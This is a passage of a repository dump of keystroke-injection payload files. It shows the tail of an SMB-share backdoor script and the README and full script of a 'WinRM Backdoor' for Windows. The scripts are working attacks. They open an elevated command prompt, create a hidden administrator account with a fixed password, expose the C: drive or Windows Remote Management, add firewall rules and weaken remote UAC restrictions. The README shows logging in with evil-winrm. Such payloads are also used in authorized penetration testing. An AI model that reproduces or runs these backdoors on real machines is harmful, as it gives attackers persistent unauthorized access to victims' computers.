(RD_SHARE).\nREM # 4) Adds a rule to the firewall.\nREM # 5) Sets a value to \"LocalAccountTokenFilterPolicy\" to access the \"C:\" with a local account.\nREM # 6) Hides this user account.\nREM #\nREM # Author: TW-D\nREM # Version: 1.0\nREM # Category: Remote Access\nREM # Target: Microsoft Windows\nREM #\nREM # TESTED ON\nREM # ===============\nREM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)\nREM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)\nREM #\nREM # REQUIREMENTS\nREM # ===============\nREM # The target user must belong to the 'Administrators' group.\nREM #\n\nREM ######## INITIALIZATION ########\n\nDELAY 2000\n\nREM ######## STAGE1 ########\n\nGUI r\nDELAY 3000\nSTRING cmd\nDELAY 1000\nCTRL-SHIFT ENTER\nDELAY 3000\nLEFTARROW\nDELAY 5000\nENTER\nDELAY 5000\n\nREM ######## STAGE2 ########\n\nSTRING NET USER RD_User RD_P@ssW0rD /ADD\nENTER\nDELAY 1500\n\nSTRING NET LOCALGROUP Administrators RD_User /ADD\nENTER\nDELAY 1500\n\nREM ######## STAGE3 ########\n\nSTRING NET SHARE RD_SHARE=C:\\ /GRANT:RD_User,FULL /REMARK:\"RRemote DShare\"\nENTER\nDELAY 1500\n\nSTRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME=\"Server Message Block for RD\" PROTOCOL=TCP LOCALPORT=445 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN\nENTER\nDELAY 1500\n\nREM ######## STAGE4 ########\n\nSTRING REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1\nENTER\nDELAY 1500\n\nSTRING REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /f /v RD_User /t REG_DWORD /d 0\nENTER\nDELAY 1500\n\nREM ######## FINISH ########\n\nSTRING EXIT\nENTER\n" }, { "path": "payloads/library/remote_access/win_winrm-backdoor/README.md", "content": "# \"Microsoft Windows\" WinRM Backdoor\n\n- Title: \"Microsoft Windows\" WinRM Backdoor\n- Author: TW-D\n- Version: 1.0\n- Target: Microsoft Windows\n- Category: Remote Access\n\n## Description\n\n1) Adds a user account (RD_User:RD_P@ssW0rD).\n2) Adds this local user to local administrator group.\n3) Enables \"Windows Remote Management\" with default settings.\n4) Adds a rule to the firewall.\n5) Sets a value to \"LocalAccountTokenFilterPolicy\" to disable \"UAC\" remote restrictions.\n6) Hides this user account.\n\n## Exploitation\n\n>\n> The connection identifiers will be those defined by the values : **RD_User** and **RD_P@ssW0rD**.\n>\n\n```\nhacker@hacker-computer:~$ evil-winrm --ip --user RD_User --password 'RD_P@ssW0rD'\n*Evil-WinRM* PS C:\\Users\\RD_User\\Documents> whoami\ndesktop-xxxxxxx\\rd_user\n```\n" }, { "path": "payloads/library/remote_access/win_winrm-backdoor/payload.txt", "content": "REM #\nREM # Title: \"Microsoft Windows\" WinRM Backdoor\nREM #\nREM # Description: \nREM # 1) Adds a user account (RD_User:RD_P@ssW0rD).\nREM # 2) Adds this local user to local administrator group.\nREM # 3) Enables \"Windows Remote Management\" with default settings.\nREM # 4) Adds a rule to the firewall.\nREM # 5) Sets a value to \"LocalAccountTokenFilterPolicy\" to disable \"UAC\" remote restrictions.\nREM # 6) Hides this user account.\nREM #\nREM # Author: TW-D\nREM # Version: 1.0\nREM # Category: Remote Access\nREM # Target: Microsoft Windows\nREM #\nREM # TESTED ON\nREM # ===============\nREM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)\nREM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)\nREM #\nREM # REQUIREMENTS\nREM # ===============\nREM # The target user must belong to the 'Administrators' group.\nREM #\n\nREM ######## INITIALIZATION ########\n\nDELAY 2000\n\nREM ######## STAGE1 ########\n\nGUI r\nDELAY 3000\nSTRING cmd\nDELAY 1000\nCTRL-SHIFT ENTER\nDELAY 3000\nLEFTARROW\nDELAY 5000\nENTER\nDELAY 5000\n\nREM ######## STAGE2 ########\n\nSTRING NET USER RD_User RD_P@ssW0rD /ADD\nENTER\nDELAY 1500\n\nSTRING NET LOCALGROUP Administrators RD_User /ADD\nENTER\nDELAY 1500\n\nREM ######## STAGE3 ########\n\nSTRING WINRM QUICKCONFIG\nENTER\nDELAY 4000\n\nSTRING y\nENTER\nDELAY 1500\n\nSTRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME=\"Windows Remote Management for RD\" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN\nENTER\nDELAY 1500\n\nREM ######## STAGE4 ########\n\nSTRING REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1\nENTER\nDELAY 1500\n\nSTRING REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /f /v RD_User /t REG_DWORD /d 0\nENTER\nDELAY 1500\n\nREM ######## FINISH ########\n\nSTRING EXIT\nENTER\n" } ]